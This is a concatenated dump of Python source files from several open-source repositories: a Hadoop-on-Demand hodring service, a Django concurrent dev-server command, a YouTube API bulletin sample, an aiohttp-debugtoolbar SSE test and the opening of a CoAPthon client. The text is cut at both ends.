quoting=csv.QUOTE_NONE, doublequote=False):
list.extend(row)
return list
_parseList = staticmethod(_parseList)
def _parseMap(str):
"""Parses key value pairs"""
dict = {}
for row in csv.reader([str], escapechar='\\', quoting=csv.QUOTE_NONE, doublequote=False):
for f in row:
[k, v] = f.split('=', 1)
dict[k] = v
return dict
_parseMap = staticmethod(_parseMap)
class MRSystemDirectoryManager:
"""Class that is responsible for managing the MapReduce system directory"""
def __init__(self, jtPid, mrSysDir, fsName, hadoopPath, log, retries=120):
self.__jtPid = jtPid
self.__mrSysDir = mrSysDir
self.__fsName = fsName
self.__hadoopPath = hadoopPath
self.__log = log
self.__retries = retries
def toCleanupArgs(self):
return " --jt-pid %s --mr-sys-dir %s --fs-name %s --hadoop-path %s " \
% (self.__jtPid, self.__mrSysDir, self.__fsName, self.__hadoopPath)
def removeMRSystemDirectory(self):
jtActive = isProcessRunning(self.__jtPid)
count = 0 # try for a max of a minute for the process to end
while jtActive and (count<self.__retries):
time.sleep(0.5)
jtActive = isProcessRunning(self.__jtPid)
count += 1
if count == self.__retries:
self.__log.warn('Job Tracker did not exit even after a minute. Not going to try and cleanup the system directory')
return
self.__log.debug('jt is now inactive')
cmd = "%s dfs -fs hdfs://%s -rmr %s" % (self.__hadoopPath, self.__fsName, \
self.__mrSysDir)
self.__log.debug('Command to run to remove system directory: %s' % (cmd))
try:
hadoopCommand = simpleCommand('mr-sys-dir-cleaner', cmd)
hadoopCommand.start()
hadoopCommand.wait()
hadoopCommand.join()
ret = hadoopCommand.exit_code()
if ret != 0:
self.__log.warn("Error in removing MapReduce system directory '%s' from '%s' using path '%s'" \
% (self.__mrSysDir, self.__fsName, self.__hadoopPath))
self.__log.warn(pprint.pformat(hadoopCommand.output()))
else:
self.__log.info("Removed MapReduce system directory successfully.")
except:
self.__log.error('Exception while cleaning up MapReduce system directory. May not be cleaned up. %s', \
get_exception_error_string())
self.__log.debug(get_exception_string())
def createMRSystemDirectoryManager(dict, log):
keys = [ 'jt-pid', 'mr-sys-dir', 'fs-name', 'hadoop-path' ]
for key in keys:
if (not dict.has_key(key)) or (dict[key] is None):
return None
mrSysDirManager = MRSystemDirectoryManager(int(dict['jt-pid']), dict['mr-sys-dir'], \
dict['fs-name'], dict['hadoop-path'], log)
return mrSysDirManager
class HadoopCommand:
"""Runs a single hadoop command"""
def __init__(self, id, desc, tempdir, tardir, hadoopportrange, log, javahome,
mrSysDir, restart=False):
self.desc = desc
self.log = log
self.javahome = javahome
self.__mrSysDir = mrSysDir
self.program = desc.getProgram()
self.name = desc.getName()
self.workdirs = desc.getWorkDirs()
self.hadoopdir = tempdir
self.confdir = os.path.join(self.hadoopdir, '%d-%s' % (id, self.name),
"confdir")
self.logdir = os.path.join(self.hadoopdir, '%d-%s' % (id, self.name),
"logdir")
self.out = os.path.join(self.logdir, '%s.out' % self.name)
self.err = os.path.join(self.logdir, '%s.err' % self.name)
self.child = None
self.restart = restart
self.filledInKeyVals = []
self.__hadoopPortRange = hadoopportrange
self._createWorkDirs()
self._createHadoopSiteXml()
self._createHadoopLogDir()
self.__hadoopThread = None
self.stdErrContents = "" # store list of contents for returning to user
def _createWorkDirs(self):
for dir in self.workdirs:
if os.path.exists(dir):
if not os.access(dir, os.F_OK | os.R_OK | os.W_OK | os.X_OK):
raise ValueError, "Workdir %s does not allow rwx permission." % (dir)
continue
try:
os.makedirs(dir)
except:
pass
def getFilledInKeyValues(self):
return self.filledInKeyVals
def createXML(self, doc, attr, topElement, final):
for k,v in attr.iteritems():
self.log.debug('_createHadoopSiteXml: ' + str(k) + " " + str(v))
lowport, highport = self.__hadoopPortRange
if ( v == "fillinport" ):
v = "%d" % (ServiceUtil.getUniqRandomPort(low=lowport, high=highport, log=self.log))
keyvalpair = ''
if isinstance(v, (tuple, list)):
for item in v:
keyvalpair = "%s%s=%s," % (keyvalpair, k, item)
keyvalpair = keyvalpair[:-1]
else:
keyvalpair = k + '=' + v
self.filledInKeyVals.append(keyvalpair)
if(k == "mapred.job.tracker"): # total hack for time's sake
keyvalpair = k + "=" + v
self.filledInKeyVals.append(keyvalpair)
if ( v == "fillinhostport"):
port = "%d" % (ServiceUtil.getUniqRandomPort(low=lowport, high=highport, log=self.log))
self.log.debug('Setting hostname to: %s' % local_fqdn())
v = local_fqdn() + ':' + port
keyvalpair = ''
if isinstance(v, (tuple, list)):
for item in v:
keyvalpair = "%s%s=%s," % (keyvalpair, k, item)
keyvalpair = keyvalpair[:-1]
else:
keyvalpair = k + '=' + v
self.filledInKeyVals.append(keyvalpair)
if ( v == "fillindir"):
v = self.__mrSysDir
pass
prop = None
if isinstance(v, (tuple, list)):
for item in v:
prop = self._createXmlElement(doc, k, item, "No description", final)
topElement.appendChild(prop)
else:
if k == 'fs.default.name':
prop = self._createXmlElement(doc, k, "hdfs://" + v, "No description", final)
else:
prop = self._createXmlElement(doc, k, v, "No description", final)
topElement.appendChild(prop)
def _createHadoopSiteXml(self):
if self.restart:
if not os.path.exists(self.confdir):
os.makedirs(self.confdir)
else:
assert os.path.exists(self.confdir) == False
os.makedirs(self.confdir)
implementation = getDOMImplementation()
doc = implementation.createDocument('', 'configuration', None)
comment = doc.createComment("This is an auto generated hadoop-site.xml, do not modify")
topElement = doc.documentElement
topElement.appendChild(comment)
finalAttr = self.desc.getfinalAttrs()
self.createXML(doc, finalAttr, topElement, True)
attr = {}
attr1 = self.desc.getAttrs()
for k,v in attr1.iteritems():
if not finalAttr.has_key(k):
attr[k] = v
self.createXML(doc, attr, topElement, False)
siteName = os.path.join(self.confdir, "hadoop-site.xml")
sitefile = file(siteName, 'w')
print >> sitefile, topElement.toxml()
sitefile.close()
self.log.debug('created %s' % (siteName))
def _createHadoopLogDir(self):
if self.restart:
if not os.path.exists(self.logdir):
os.makedirs(self.logdir)
else:
assert os.path.exists(self.logdir) == False
os.makedirs(self.logdir)
def _createXmlElement(self, doc, name, value, description, final):
prop = doc.createElement("property")
nameP = doc.createElement("name")
string = doc.createTextNode(name)
nameP.appendChild(string)
valueP = doc.createElement("value")
string = doc.createTextNode(value)
valueP.appendChild(string)
desc = doc.createElement("description")
string = doc.createTextNode(description)
desc.appendChild(string)
prop.appendChild(nameP)
prop.appendChild(valueP)
prop.appendChild(desc)
if (final):
felement = doc.createElement("final")
string = doc.createTextNode("true")
felement.appendChild(string)
prop.appendChild(felement)
pass
return prop
def getMRSystemDirectoryManager(self):
return MRSystemDirectoryManager(self.__hadoopThread.getPid(), self.__mrSysDir, \
self.desc.getfinalAttrs()['fs.default.name'], \
self.path, self.log)
def run(self, dir):
status = True
args = []
desc = self.desc
self.log.debug(pprint.pformat(desc.dict))
self.log.debug("Got package dir of %s" % dir)
self.path = os.path.join(dir, self.program)
self.log.debug("path: %s" % self.path)
args.append(self.path)
args.extend(desc.getArgv())
envs = desc.getEnvs()
fenvs = os.environ
for k, v in envs.iteritems():
fenvs[k] = v
if envs.has_key('HADOOP_OPTS'):
fenvs['HADOOP_OPTS'] = envs['HADOOP_OPTS']
self.log.debug("HADOOP_OPTS : %s" % fenvs['HADOOP_OPTS'])
fenvs['JAVA_HOME'] = self.javahome
fenvs['HADOOP_CONF_DIR'] = self.confdir
fenvs['HADOOP_LOG_DIR'] = self.logdir
self.log.info(pprint.pformat(fenvs))
hadoopCommand = ''
for item in args:
hadoopCommand = "%s%s " % (hadoopCommand, item)
# Redirecting output and error to self.out and self.err
hadoopCommand = hadoopCommand + ' 1>%s 2>%s ' % (self.out, self.err)
self.log.debug('running command: %s' % (hadoopCommand))
self.log.debug('hadoop env: %s' % fenvs)
self.log.debug('Command stdout will be redirected to %s ' % self.out + \
'and command stderr to %s' % self.err)
self.__hadoopThread = simpleCommand('hadoop', hadoopCommand, env=fenvs)
self.__hadoopThread.start()
while self.__hadoopThread.stdin == None:
time.sleep(.2)
self.log.debug("hadoopThread still == None ...")
input = desc.getStdin()
self.log.debug("hadoop input: %s" % input)
if input:
if self.__hadoopThread.is_running():
print >>self.__hadoopThread.stdin, input
else:
self.log.error("hadoop command failed to start")
self.__hadoopThread.stdin.close()
self.log.debug("isForground: %s" % desc.isForeground())
if desc.isForeground():
self.log.debug("Waiting on hadoop to finish...")
self.__hadoopThread.wait()
self.log.debug("Joining hadoop thread...")
self.__hadoopThread.join()
if self.__hadoopThread.exit_code() != 0:
status = False
else:
status = self.getCommandStatus()
self.log.debug("hadoop run status: %s" % status)
if status == False:
self.handleFailedCommand()
if (status == True) or (not desc.isIgnoreFailures()):
return status
else:
self.log.error("Ignoring Failure")
return True
def kill(self):
self.__hadoopThread.kill()
if self.__hadoopThread:
self.__hadoopThread.join()
def addCleanup(self, list):
list.extend(self.workdirs)
list.append(self.confdir)
def getCommandStatus(self):
status = True
ec = self.__hadoopThread.exit_code()
if (ec != 0) and (ec != None):
status = False
return status
def handleFailedCommand(self):
self.log.error('hadoop error: %s' % (
self.__hadoopThread.exit_status_string()))
# read the contents of redirected stderr to print information back to user
if os.path.exists(self.err):
f = None
try:
f = open(self.err)
lines = f.readlines()
# format
for line in lines:
self.stdErrContents = "%s%s" % (self.stdErrContents, line)
finally:
if f is not None:
f.close()
self.log.error('See %s.out and/or %s.err for details. They are ' % \
(self.name, self.name) + \
'located at subdirectories under either ' + \
'hodring.work-dirs or hodring.log-destination-uri.')
class HodRing(hodBaseService):
"""The main class for hodring that
polls the commands it runs"""
def __init__(self, config):
hodBaseService.__init__(self, 'hodring', config['hodring'])
self.log = self.logs['main']
self._http = None
self.__pkg = None
self.__pkgDir = None
self.__tempDir = None
self.__running = {}
self.__hadoopLogDirs = []
self.__init_temp_dir()
def __init_temp_dir(self):
self.__tempDir = os.path.join(self._cfg['temp-dir'],
"%s.%s.hodring" % (self._cfg['userid'],
self._cfg['service-id']))
if not os.path.exists(self.__tempDir):
os.makedirs(self.__tempDir)
os.chdir(self.__tempDir)
def __fetch(self, url, spath):
retry = 3
success = False
while (retry != 0 and success != True):
try:
input = urllib.urlopen(url)
bufsz = 81920
buf = input.read(bufsz)
out = open(spath, 'w')
while len(buf) > 0:
out.write(buf)
buf = input.read(bufsz)
input.close()
out.close()
success = True
except:
self.log.debug("Failed to copy file")
retry = retry - 1
if (retry == 0 and success != True):
raise IOError, "Failed to copy the files"
def __get_name(self, addr):
parsedUrl = urlparse(addr)
path = parsedUrl[2]
split = path.split('/', 1)
return split[1]
def __get_dir(self, name):
"""Return the root directory inside the tarball
specified by name. Assumes that the tarball begins
with a root directory."""
import tarfile
myTarFile = tarfile.open(name)
hadoopPackage = myTarFile.getnames()[0]
self.log.debug("tarball name : %s hadoop package name : %s" %(name,hadoopPackage))
return hadoopPackage
def getRunningValues(self):
return self.__running.values()
def getTempDir(self):
return self.__tempDir
def getHadoopLogDirs(self):
return self.__hadoopLogDirs
def __download_package(self, ringClient):
self.log.debug("Found download address: %s" %
self._cfg['download-addr'])
try:
addr = 'none'
downloadTime = self._cfg['tarball-retry-initial-time'] # download time depends on tarball size and network bandwidth
increment = 0
addr = ringClient.getTarList(self.hostname)
while(addr == 'none'):
rand = self._cfg['tarball-retry-initial-time'] + increment + \
random.uniform(0,self._cfg['tarball-retry-interval'])
increment = increment + 1
self.log.debug("got no tarball. Retrying again in %s seconds." % rand)
time.sleep(rand)
addr = ringClient.getTarList(self.hostname)
self.log.debug("got this address %s" % addr)
tarName = self.__get_name(addr)
self.log.debug("tar package name: %s" % tarName)
fetchPath = os.path.join(os.getcwd(), tarName)
self.log.debug("fetch path: %s" % fetchPath)
self.__fetch(addr, fetchPath)
self.log.debug("done fetching")
tarUrl = "http://%s:%d/%s" % (self._http.server_address[0],
self._http.server_address[1],
tarName)
try:
ringClient.registerTarSource(self.hostname, tarUrl,addr)
#ringClient.tarDone(addr)
except KeyError, e:
self.log.error("registerTarSource and tarDone failed: ", e)
raise KeyError(e)
check = untar(fetchPath, os.getcwd())
if (check == False):
raise IOError, "Untarring failed."
self.__pkg = self.__get_dir(tarName)
self.__pkgDir = os.path.join(os.getcwd(), self.__pkg)
except Exception, e:
self.log.error("Failed download tar package: %s" %
get_exception_error_string())
raise Exception(e)
def __run_hadoop_commands(self, restart=True):
id = 0
for desc in self._cfg['commanddesc']:
self.log.debug(pprint.pformat(desc.dict))
mrSysDir = getMapredSystemDirectory(self._cfg['mapred-system-dir-root'],
self._cfg['userid'], self._cfg['service-id'])
self.log.debug('mrsysdir is %s' % mrSysDir)
cmd = HadoopCommand(id, desc, self.__tempDir, self.__pkgDir, self._cfg['hadoop-port-range'], self.log,
self._cfg['java-home'], mrSysDir, restart)
self.__hadoopLogDirs.append(cmd.logdir)
self.log.debug("hadoop log directory: %s" % self.__hadoopLogDirs)
try:
# if the tarball isn't there, we use the pkgs dir given.
if self.__pkgDir == None:
pkgdir = desc.getPkgDirs()
else:
pkgdir = self.__pkgDir
self.log.debug('This is the packcage dir %s ' % (pkgdir))
if not cmd.run(pkgdir):
addnInfo = ""
if cmd.stdErrContents is not "":
addnInfo = " Information from stderr of the command:\n%s" % (cmd.stdErrContents)
raise Exception("Could not launch the %s using %s/bin/hadoop.%s" % (desc.getName(), pkgdir, addnInfo))
except Exception, e:
self.log.debug("Exception running hadoop command: %s\n%s" % (get_exception_error_string(), get_exception_string()))
self.__running[id] = cmd
raise Exception(e)
id += 1
if desc.isForeground():
continue
self.__running[id-1] = cmd
# ok.. now command is running. If this HodRing got jobtracker,
# Check if it is ready for accepting jobs, and then only return
self.__check_jobtracker(desc, id-1, pkgdir)
def __check_jobtracker(self, desc, id, pkgdir):
# Check jobtracker status. Return properly if it is ready to accept jobs.
# Currently Checks for Jetty to come up, the last thing that can be checked
# before JT completes initialisation. To be perfectly reliable, we need
# hadoop support
name = desc.getName()
if name == 'jobtracker':
# Yes I am the Jobtracker
self.log.debug("Waiting for jobtracker to initialise")
version = desc.getVersion()
self.log.debug("jobtracker version : %s" % version)
hadoopCmd = self.getRunningValues()[id]
attrs = hadoopCmd.getFilledInKeyValues()
attrs = parseEquals(attrs)
jobTrackerAddr = attrs['mapred.job.tracker']
self.log.debug("jobtracker rpc server : %s" % jobTrackerAddr)
if version < 16:
jettyAddr = jobTrackerAddr.split(':')[0] + ':' + \
attrs['mapred.job.tracker.info.port']
else:
jettyAddr = attrs['mapred.job.tracker.http.address']
self.log.debug("Jobtracker jetty : %s" % jettyAddr)
# Check for Jetty to come up
# For this do a http head, and then look at the status
defaultTimeout = socket.getdefaulttimeout()
# socket timeout isn`t exposed at httplib level. Setting explicitly.
socket.setdefaulttimeout(1)
sleepTime = 0.5
jettyStatus = False
jettyStatusmsg = ""
while sleepTime <= 32:
# There is a possibility that the command might fail after a while.
# This code will check if the command failed so that a better
# error message can be returned to the user.
if not hadoopCmd.getCommandStatus():
self.log.critical('Hadoop command found to have failed when ' \
'checking for jobtracker status')
hadoopCmd.handleFailedCommand()
addnInfo = ""
if hadoopCmd.stdErrContents is not "":
addnInfo = " Information from stderr of the command:\n%s" \
% (hadoopCmd.stdErrContents)
raise Exception("Could not launch the %s using %s/bin/hadoop.%s" \
% (desc.getName(), pkgdir, addnInfo))
try:
jettyConn = httplib.HTTPConnection(jettyAddr)
jettyConn.request("HEAD", "/jobtracker.jsp")
# httplib inherently retries the following till socket timeout
resp = jettyConn.getresponse()
if resp.status != 200:
# Some problem?
jettyStatus = False
jettyStatusmsg = "Jetty gave a non-200 response to a HTTP-HEAD" +\
" request. HTTP Status (Code, Msg): (%s, %s)" % \
( resp.status, resp.reason )
break
else:
self.log.info("Jetty returned a 200 status (%s)" % resp.reason)
self.log.info("JobTracker successfully initialised")
return
except socket.error:
self.log.debug("Jetty gave a socket error. Sleeping for %s" \
% sleepTime)
time.sleep(sleepTime)
sleepTime = sleepTime * 2
except Exception, e:
jettyStatus = False
jettyStatusmsg = ("Process(possibly other than jetty) running on" + \
" port assigned to jetty is returning invalid http response")
break
socket.setdefaulttimeout(defaultTimeout)
if not jettyStatus:
self.log.critical("Jobtracker failed to initialise.")
if jettyStatusmsg:
self.log.critical( "Reason: %s" % jettyStatusmsg )
else: self.log.critical( "Reason: Jetty failed to give response")
raise Exception("JobTracker failed to initialise")
def stop(self):
self.log.debug("Entered hodring stop.")
if self._http:
self.log.debug("stopping http server...")
self._http.stop()
self.log.debug("call hodsvcrgy stop...")
hodBaseService.stop(self)
def _xr_method_clusterStart(self, initialize=True):
return self.clusterStart(initialize)
def _xr_method_clusterStop(self):
return self.clusterStop()
def start(self):
"""Run and maintain hodring commands"""
try:
if self._cfg.has_key('download-addr'):
self._http = threadedHTTPServer('', self._cfg['http-port-range'])
self.log.info("Starting http server...")
self._http.serve_forever()
self.log.debug("http://%s:%d" % (self._http.server_address[0],
self._http.server_address[1]))
hodBaseService.start(self)
ringXRAddress = None
if self._cfg.has_key('ringmaster-xrs-addr'):
ringXRAddress = "http://%s:%s/" % (self._cfg['ringmaster-xrs-addr'][0],
self._cfg['ringmaster-xrs-addr'][1])
self.log.debug("Ringmaster at %s" % ringXRAddress)
self.log.debug("Creating service registry XML-RPC client.")
serviceClient = hodXRClient(to_http_url(
self._cfg['svcrgy-addr']))
if ringXRAddress == None:
self.log.info("Did not get ringmaster XML-RPC address. Fetching information from service registry.")
ringList = serviceClient.getServiceInfo(self._cfg['userid'],
self._cfg['service-id'], 'ringmaster', 'hod')
self.log.debug(pprint.pformat(ringList))
if len(ringList):
if isinstance(ringList, list):
ringXRAddress = ringList[0]['xrs']
count = 0
while (ringXRAddress == None and count < 3000):
ringList = serviceClient.getServiceInfo(self._cfg['userid'],
self._cfg['service-id'], 'ringmaster', 'hod')
if len(ringList):
if isinstance(ringList, list):
ringXRAddress = ringList[0]['xrs']
count = count + 1
time.sleep(.2)
if ringXRAddress == None:
raise Exception("Could not get ringmaster XML-RPC server address.")
self.log.debug("Creating ringmaster XML-RPC client.")
ringClient = hodXRClient(ringXRAddress)
id = self.hostname + "_" + str(os.getpid())
if 'download-addr' in self._cfg:
self.__download_package(ringClient)
else:
self.log.debug("Did not find a download address.")
cmdlist = []
firstTime = True
increment = 0
hadoopStartupTime = 2
cmdlist = ringClient.getCommand(id)
while (cmdlist == []):
if firstTime:
sleepTime = increment + self._cfg['cmd-retry-initial-time'] + hadoopStartupTime\
+ random.uniform(0,self._cfg['cmd-retry-interval'])
firstTime = False
else:
sleepTime = increment + self._cfg['cmd-retry-initial-time'] + \
+ random.uniform(0,self._cfg['cmd-retry-interval'])
self.log.debug("Did not get command list. Waiting for %s seconds." % (sleepTime))
time.sleep(sleepTime)
increment = increment + 1
cmdlist = ringClient.getCommand(id)
self.log.debug(pformat(cmdlist))
cmdDescs = []
for cmds in cmdlist:
cmdDescs.append(CommandDesc(cmds['dict'], self.log))
self._cfg['commanddesc'] = cmdDescs
self.log.info("Running hadoop commands...")
self.__run_hadoop_commands(False)
masterParams = []
for k, cmd in self.__running.iteritems():
masterParams.extend(cmd.filledInKeyVals)
self.log.debug("printing getparams")
self.log.debug(pformat(id))
self.log.debug(pformat(masterParams))
# when this is on a required host, the ringMaster already has our masterParams
if(len(masterParams) > 0):
ringClient.addMasterParams(id, masterParams)
except Exception, e:
raise Exception(e)
def clusterStart(self, initialize=True):
"""Start a stopped mapreduce/dfs cluster"""
if initialize:
self.log.debug('clusterStart Method Invoked - Initialize')
else:
self.log.debug('clusterStart Method Invoked - No Initialize')
try:
self.log.debug("Creating service registry XML-RPC client.")
serviceClient = hodXRClient(to_http_url(self._cfg['svcrgy-addr']),
None, None, 0, 0, 0)
self.log.info("Fetching ringmaster information from service registry.")
count = 0
ringXRAddress = None
while (ringXRAddress == None and count < 3000):
ringList = serviceClient.getServiceInfo(self._cfg['userid'],
self._cfg['service-id'], 'ringmaster', 'hod')
if len(ringList):
if isinstance(ringList, list):
ringXRAddress = ringList[0]['xrs']
count = count + 1
if ringXRAddress == None:
raise Exception("Could not get ringmaster XML-RPC server address.")
self.log.debug("Creating ringmaster XML-RPC client.")
ringClient = hodXRClient(ringXRAddress, None, None, 0, 0, 0)
id = self.hostname + "_" + str(os.getpid())
cmdlist = []
if initialize:
if 'download-addr' in self._cfg:
self.__download_package(ringClient)
else:
self.log.debug("Did not find a download address.")
while (cmdlist == []):
cmdlist = ringClient.getCommand(id)
else:
while (cmdlist == []):
cmdlist = ringClient.getAdminCommand(id)
self.log.debug(pformat(cmdlist))
cmdDescs = []
for cmds in cmdlist:
cmdDescs.append(CommandDesc(cmds['dict'], self.log))
self._cfg['commanddesc'] = cmdDescs
if initialize:
self.log.info("Running hadoop commands again... - Initialize")
self.__run_hadoop_commands()
masterParams = []
for k, cmd in self.__running.iteritems():
self.log.debug(cmd)
masterParams.extend(cmd.filledInKeyVals)
self.log.debug("printing getparams")
self.log.debug(pformat(id))
self.log.debug(pformat(masterParams))
# when this is on a required host, the ringMaster already has our masterParams
if(len(masterParams) > 0):
ringClient.addMasterParams(id, masterParams)
else:
self.log.info("Running hadoop commands again... - No Initialize")
self.__run_hadoop_commands()
except:
self.log.error(get_exception_string())
return True
def clusterStop(self):
"""Stop a running mapreduce/dfs cluster without stopping the hodring"""
self.log.debug('clusterStop Method Invoked')
try:
for cmd in self.__running.values():
cmd.kill()
self.__running = {}
except:
self.log.error(get_exception_string())
return True
|
jianlirong/incubator-hawq | refs/heads/master | tools/bin/pythonSrc/pychecker-0.8.18/test_input/test3.py | 11 |
"Shouldn't be any warnings/errors"
import string
def describeSyntax(syntax):
return string.join(['<%s>' % x.Description])
from UserDict import UserDict
class jj(UserDict) :
def __init__(self):
UserDict.__init__(self)
|
losywee/rethinkdb | refs/heads/next | packaging/osx/mac_alias/__init__.py | 50 | from .alias import *
__all__ = [ 'ALIAS_KIND_FILE', 'ALIAS_KIND_FOLDER',
'ALIAS_HFS_VOLUME_SIGNATURE',
'ALIAS_FIXED_DISK', 'ALIAS_NETWORK_DISK', 'ALIAS_400KB_FLOPPY_DISK',
'ALIAS_800KB_FLOPPY_DISK', 'ALIAS_1_44MB_FLOPPY_DISK',
'ALIAS_EJECTABLE_DISK',
'ALIAS_NO_CNID',
'AppleShareInfo',
'VolumeInfo',
'TargetInfo',
'Alias' ]
|
smart-classic/smart_server | refs/heads/master | django_concurrent_test_server/management/commands/runconcurrentserver.py | 4 | from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
import os
import sys
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--noreload', action='store_false', dest='use_reloader', default=True,
help='Tells Django to NOT use the auto-reloader.'),
make_option('--adminmedia', dest='admin_media_path', default='',
help='Specifies the directory from which to serve admin media.'),
)
help = "Starts a lightweight Web server for development."
args = '[optional port number, or ipaddr:port]'
# Validation is called explicitly each time the server is reloaded.
requires_model_validation = False
def handle(self, addrport='', *args, **options):
import django
from django.core.servers.basehttp import AdminMediaHandler, WSGIServerException
from django.core.handlers.wsgi import WSGIHandler
from django_concurrent_test_server.servers import run
if args:
raise CommandError('Usage is runserver %s' % self.args)
if not addrport:
addr = ''
port = '8000'
else:
try:
addr, port = addrport.split(':')
except ValueError:
addr, port = '', addrport
if not addr:
addr = '127.0.0.1'
if not port.isdigit():
raise CommandError("%r is not a valid port number." % port)
use_reloader = options.get('use_reloader', True)
admin_media_path = options.get('admin_media_path', '')
shutdown_message = options.get('shutdown_message', '')
quit_command = (sys.platform == 'win32') and 'CTRL-BREAK' or 'CONTROL-C'
def inner_run():
from django.conf import settings
from django.utils import translation
print "Validating models..."
self.validate(display_num_errors=True)
print "\nDjango version %s, using settings %r" % (django.get_version(), settings.SETTINGS_MODULE)
print "Development server is running at http://%s:%s/" % (addr, port)
print "Quit the server with %s." % quit_command
# django.core.management.base forces the locale to en-us. We should
# set it up correctly for the first request (particularly important
# in the "--noreload" case).
translation.activate(settings.LANGUAGE_CODE)
try:
handler = AdminMediaHandler(WSGIHandler(), admin_media_path)
run(addr, int(port), handler)
except WSGIServerException, e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
13: "You don't have permission to access that port.",
98: "That port is already in use.",
99: "That IP address can't be assigned-to.",
}
try:
error_text = ERRORS[e.args[0].args[0]]
except (AttributeError, KeyError):
error_text = str(e)
sys.stderr.write(self.style.ERROR("Error: %s" % error_text) + '\n')
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
print shutdown_message
sys.exit(0)
if use_reloader:
from django.utils import autoreload
autoreload.main(inner_run)
else:
inner_run()
|
lhongskie/yt-samples-python | refs/heads/master | channel_bulletin.py | 1 | #!/usr/bin/python
import httplib2
import os
import sys
from apiclient.discovery import build
from oauth2client.file import Storage
from oauth2client.client import flow_from_clientsecrets
from oauth2client.tools import run
from optparse import OptionParser
# CLIENT_SECRETS_FILE, name of a file containing the OAuth 2.0 information for
# this application, including client_id and client_secret. You can acquire an
# ID/secret pair from the API Access tab on the Google APIs Console
# http://code.google.com/apis/console#access
# For more information about using OAuth2 to access Google APIs, please visit:
# https://developers.google.com/accounts/docs/OAuth2
# For more information about the client_secrets.json file format, please visit:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
# Please ensure that you have enabled the YouTube Data API for your project.
CLIENT_SECRETS_FILE = "client_secrets.json"
# An OAuth 2 access scope that allows for full read/write access.
YOUTUBE_READ_WRITE_SCOPE = "https://www.googleapis.com/auth/youtube"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
# Helpful message to display if the CLIENT_SECRETS_FILE is missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the APIs Console
https://code.google.com/apis/console#access
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
CLIENT_SECRETS_FILE))
def get_authenticated_service():
flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,
scope=YOUTUBE_READ_WRITE_SCOPE,
message=MISSING_CLIENT_SECRETS_MESSAGE)
storage = Storage("%s-oauth2.json" % sys.argv[0])
credentials = storage.get()
if credentials is None or credentials.invalid:
credentials = run(flow, storage)
return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
http=credentials.authorize(httplib2.Http()))
def post_bulletin(youtube, options):
body = dict(
snippet=dict(
description=options.message
)
)
if options.videoid:
body["contentDetails"] = dict(
bulletin=dict(
resourceId=dict(
kind="youtube#video",
videoId=options.videoid
)
)
)
if options.playlistid:
body["contentDetails"] = dict(
bulletin=dict(
resourceId=dict(
kind="youtube#playlist",
playlistId=options.playlistid
)
)
)
youtube.activities().insert(
part=",".join(body.keys()),
body=body
).execute()
print "The bulletin was posted to your channel."
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--message", dest="message",
help="Required text of message to post.")
parser.add_option("--videoid", dest="videoid",
help="Optional ID of video to post.")
parser.add_option("--playlistid", dest="playlistid",
help="Optional ID of playlist to post.")
(options, args) = parser.parse_args()
# You can post a message with or without an accompanying video or playlist.
# You can't post both a video and playlist at the same time.
if options.videoid and options.playlistid:
parser.print_help()
exit("\nYou cannot post a video and a playlist at the same time.")
if not options.message:
parser.print_help()
exit("\nPlease provide a message.")
youtube = get_authenticated_service()
post_bulletin(youtube, options)
|
aio-libs/aiohttp-debugtoolbar | refs/heads/master | tests/test_server_push.py | 1 | import json
from aiohttp_debugtoolbar import APP_KEY
async def test_sse(create_server, aiohttp_client):
async def handler(request):
raise NotImplementedError
app = await create_server()
app.router.add_route('GET', '/', handler)
client = await aiohttp_client(app)
# make sure that exception page rendered
resp = await client.get('/')
txt = await resp.text()
assert 500 == resp.status
assert '<div class="debugger">' in txt
# get request id from history
history = app[APP_KEY]['request_history']
request_id = history[0][0]
url = '/_debugtoolbar/sse'
resp = await client.get(url)
data = await resp.text()
data = data.strip()
# split and check EventSource data
event_id, event, payload_raw = data.split('\n')
assert event_id == 'id: {}'.format(request_id)
assert event == 'event: new_request'
payload_json = payload_raw.strip('data: ')
payload = json.loads(payload_json)
expected = [[request_id, {"path": "/",
"scheme": "http",
"method": "GET",
"status_code": 500},
""]]
assert payload == expected, payload
|
thejdeep/CoAPthon | refs/heads/master | coapthon/client/coap.py | 2 | import logging.config
import random
import socket
import threading
import time
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer
__author__ = 'Giacomo Tanganelli'
logger = logging.getLogger(__name__)
class CoAP(object):
"""
Client class to perform requests to remote servers.
"""
def __init__(self, server, starting_mid, callback, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize the client.
:param server: Server address for incoming connections
:param callback:the callback function to be invoked when a response is received
:param starting_mid: used for testing purposes
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
self._currentMID = starting_mid
self._server = server
self._callback = callback
self._cb_ignore_read_exception = cb_ignore_read_exception
self._cb_ignore_write_exception = cb_ignore_write_exception
self.stopped = threading.Event()
self.to_be_stopped = []
self._messageLayer = MessageLayer(self._currentMID)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._requestLayer = RequestLayer(self)
addrinfo = socket.getaddrinfo(self._server[0], None)[0]
if sock is not None:
self._socket = sock
elif addrinfo[0] == socket.AF_INET:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
